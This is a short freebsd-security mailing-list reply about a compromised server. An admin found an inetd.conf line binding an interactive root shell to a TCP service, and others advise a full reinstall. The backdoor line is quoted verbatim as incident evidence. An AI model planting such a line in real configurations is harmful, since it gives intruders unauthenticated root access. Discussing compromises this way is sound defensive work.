> >I have that sinking feeling. I discovered this line at the end of
> >inetd.conf on one of our servers:
> >
> >dlip stream tcp nowait root /bin/sh sh -i
> >
> Take the box down, do a reinstall and don't run known exploitable
> daemons. The shell acquired using the above line is useable. [snip]
>
> Hope the box wasn't really doing anything important, because it's rooted
> for sure.

Thanks for the info, GP. I wonder how they got in to begin with. In any
event, it was only doing nameservice and had no sensitive files. We are
reloading it today. - Ralph

To Unsubscribe: send mail to majordomoFreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]